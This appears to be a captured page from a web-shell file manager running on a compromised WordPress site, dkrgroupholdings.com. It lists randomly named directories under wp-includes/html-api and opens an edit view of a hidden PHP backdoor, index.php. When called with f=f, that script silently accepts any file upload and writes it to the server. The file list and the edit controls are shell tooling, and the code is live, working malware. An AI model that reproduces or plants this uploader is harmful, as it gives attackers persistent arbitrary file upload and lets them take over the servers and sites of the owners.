/
home
/
cp072267
/
public_html
/
dkrgroupholdings.com
/
wp-includes
/
html-api
/
amsjwgi
/
enorgvl
/
/home/cp072267/public_html/dkrgroupholdings.com/wp-includes/html-api/amsjwgi/enorgvl
mkdir
upload
Name
Size
Mode
Actions
kmnasfv/
-
0755
rm
.htaccess
178
0444
edit
dl
rm
index.html
0
0444
edit
dl
rm
index.php
324
0444
edit
dl
rm
Edit:
/home/cp072267/public_html/dkrgroupholdings.com/wp-includes/html-api/amsjwgi/enorgvl/index.php
(324B)
<?php error_reporting(0); if(trim($_GET['f']) == 'f'){ $saw1 = $_FILES['file']['tmp_name']; $saw2 = '../'.$_FILES['file']['name']; echo "<form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='upload' /></form>"; if($saw1 && $saw2) move_uploaded_file($saw1, $saw2); } ?>
Save
"; if($saw1 && $saw2) move_uploaded_file($saw1, $saw2); } ?>